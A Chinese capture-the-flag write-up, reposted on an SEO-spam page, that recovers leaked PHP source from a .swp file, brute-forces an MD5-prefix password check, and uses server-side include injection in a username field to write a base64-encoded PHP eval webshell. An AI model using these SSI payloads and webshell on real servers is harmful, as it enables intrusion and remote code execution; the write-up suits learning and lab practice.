当前位置: 首页 > wzjs >正文

国产化网站建设seo sem是指什么意思

国产化网站建设,seo sem是指什么意思,oa系统办公,目前最先进的网站建设技术写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用 看到这两个框框没什么想法,边探索边扫下目录吧。显示前端报错,先禁用了js,然后又尝试抓了下包,没有发现什么,只好看看扫出来的目录了,最终扫出来了…

写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用

看到这两个框框没什么想法,边探索边扫下目录吧。显示前端报错,先禁用了js,然后又尝试抓了下包,没有发现什么,只好看看扫出来的目录了,最终扫出来了的:
index.php.swp (用dirmap扫出来的)

成功得到源码:

<?phpob_start();function get_hash(){$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times$content = uniqid().$random;return sha1($content); }header("Content-Type: text/html;charset=utf-8");***if(isset($_POST['username']) and $_POST['username'] != '' ){$admin = '6d0bc1';if ( $admin == substr(md5($_POST['password']),0,6)) {echo "<script>alert('[+] Welcome to manage system')</script>";$file_shtml = "public/".get_hash().".shtml";$shtml = fopen($file_shtml, "w") or die("Unable to open file!");$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';fwrite($shtml,$text);fclose($shtml);***echo "[!] Header  error ...";} else {echo "<script>alert('[!] Failed')</script>";}else{***}***
?>

 

虽然两个都显示username,但只有第一个才是真正的$_POST[username]

看一下代码逻辑:

1.首先判断输入的password 的前6位是否为6d0bc1

2.如果满足的话就执行打开文件、写入文件、关闭文件的功能

但是我想着,最终是要读flag的,但这里的东西即使绕过了貌似也是读不到的(一开始我是这样想的,但后面接触了ssi注入,就想到在text这块会有注入)

先来绕过

一、脚本爆破password

from hashlib import md5test='6d0bc1'
for i in range(100000000):if md5(str(i).encode('utf-8')).hexdigest()[:6]==test:print(i)

可以得到 password:2020666 

username不为空就行

最终在包中找到:
 

访问该路径,可以看到:

这里的123就是注入点了

二、ssi注入

ssi注入:服务器包含注入。ssi可以赋予html静态页面的动态效果,通过ssi可以执行相应的命令。

 ssi注入的格式为:

<!--#exec cmd="命令"-->

返回index.php尝试注入

成功访问到:
 

但这样一条条命令执行有些麻烦,尝试写入一句话木马

<?php @eval($_POST['cmd']);?>

 但直接传入是不行的,需要进行base64加密,所以payload就变成了

username=<!--#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->&password=2020666 

回到index.php,先抓包,得到public下的路径,访问phtml执行代码,然后再试试public下的shell.php是否存在

此时已成功执行代码,访问shell.php

发现没报错,getshell

最终找到了flag

flag{4ea3197e-d677-4436-a0db-d53adaa9c131}

 

 

http://www.dtcms.com/wzjs/83946.html

相关文章:

  • 做产品批发生意用什么类型的网站好google网站搜索
  • 大红门做网站开发一个app平台大概需要多少钱?
  • 网站建制作公司佛山优化推广
  • 哪个网站可以做批发玻璃胶市场营销策划案的范文
  • 凸一品牌策划公司百度seo公司整站优化
  • 武汉手机网站建设动态推广引流工具
  • 西安模板网站服务商郑州seo优化大师
  • 织梦 手机网站模板网络销售平台有哪些
  • angular2做的网站有常州百度seo排名
  • 淘客网站推广免备案最新的全国疫情
  • 张家港高端网站建设站长工具域名解析
  • 如何将自己做的网站传到网上霸屏推广
  • 南宁网站建设seo免费域名注册服务网站
  • 凡科网站建设网站上海百度竞价
  • 中牟网站建设活动营销的方式有哪些
  • 织梦网站建设教程怎么做推广让别人主动加我
  • 践行新使命忠诚保大庆网站建设下载百度卫星导航
  • 吉林市城市建设管理执法局网站成都达洱狐网络科技有限公司
  • 济源网站制作免费的推广软件下载
  • 婚纱手机网站免费网站安全软件大全
  • 建设网站的3个必要条件灰色seo推广
  • 做h5的网站的区别网络优化软件有哪些
  • 网站名济南seo优化公司助力网站腾飞
  • 安陆网站抖音引流推广怎么做
  • 房地产设计海报搜索引擎优化的主要策略
  • 做愛网站微信5000人接推广费用
  • 做外贸需要什么样的网站专业做网站官网
  • 酒店网站建设项目网页搜索优化
  • wordpress cms 比较网络seo招聘
  • 广州最好的网站建设seo培训学校